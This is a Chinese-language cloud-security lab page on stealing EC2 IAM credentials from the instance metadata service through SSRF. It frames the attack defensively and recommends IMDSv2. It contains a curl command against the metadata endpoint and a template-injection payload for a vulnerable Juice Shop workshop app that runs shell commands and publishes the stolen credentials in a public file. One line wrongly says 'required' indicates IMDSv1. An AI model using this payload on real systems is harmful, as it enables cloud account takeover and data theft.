Steal EC2 Metadata Credentials via SSRF

这是 AWS 环境中一种常见且众所周知的攻击。Mandiant 已发现有攻击者对漏洞进行自动扫描，从面向公网的应用程序中获取 IAM 凭据。为了降低组织面临的风险，最好对所有 EC2 实例强制执行 IMDSv2，可以增加服务器的安全性。IMDSv2 将大大降低对手通过 SSRF 或 XXE 攻击窃取 IAM 凭据的风险。

AWS开发中最常见的就是滥用与目标 EC2 实例相关的实例元数据服务 (IMDS)。

多数EC2实例可以在 169.254.169.254访问他们的IMDS。这个服务成为攻击者趋之若鹜的对象，能够获取到服务器的IAM权限，从而达到窃取数据，勒索，挖矿等目的。

攻击复现/模拟攻击

1 - 使用IMDSv1的EC2

准备一个开启了IMDSv1的EC2（也可以找一个已有的开启了IMDSv1的EC2）。

打开控制台的Amazon EC2，查看IMDSv2属性，如果是 optional，代表使用的IMDSv1，如果是required 代表使用的是IMDSv1：

挑选是 optional的EC2，使用的就是IMDSv1。

2 - 访问Metadata服务

窃取EC2上的安全凭据可以通过滥用主机上运行的现有应用程序来实现。通过利用服务器端请求伪造 (SSRF) 或 XML 外部实体 (XXE) 等常见漏洞，攻击者可以让主机上运行的应用程序检索这些 IAM 凭据。

metadata 服务可以通过EC2实例从http://169.254.169.254/latest/meta-data/ 访问。

ssh登录上EC2，假设这台EC2绑定的role的名字是s3access，然后执行：

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access

获取到类似的以下信息：

{
  "Code" : "Success",
  "LastUpdated" : "2012-04-26T16:39:16Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAIOSFODNN7EXAMPLE",
  "SecretAccessKey" : "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token" : "token",
  "Expiration" : "2017-05-17T15:09:54Z"
}

AccessKeyId和SecretAccessKey被暴露。

为了演示这一点，在下面的示例中，通过部署workshop: Startup Security: Techniques to Stay Secure while Building Quickly，workshop中提供了基于OWASP Juice Shop搭建的含有SSRF 漏洞的网站，允许我们向任意地址发出 GET 请求。我们可以利用这个漏洞向网站发出请求，提交到Username的输入框中：

#{global.process.mainModule.require('child_process').exec('x=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/) && y=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/$x) && echo $y | json_pp >frontend/dist/frontend/assets/public/credentials.json')}

上面的命令将服务器的安全凭据创建到一个assets/public/credentials.json路径下的json文件中。

之后通过AWS Command Line Interface (AWS CLI)获取。假设网站的URL地址是$JUICESHOPURL变量保存的（替换成你自己的URL地址），执行一下命令：

wget $JUICESHOPURL/assets/public/credentials.json
cat credentials.json | jq

就可以看到窃取到的credentials了。

参考资料

Steal EC2 Metadata Credentials via SSRF

上一页模拟EC2实例被远程控制下一页模拟EC2中挖矿木马

最后更新于1年前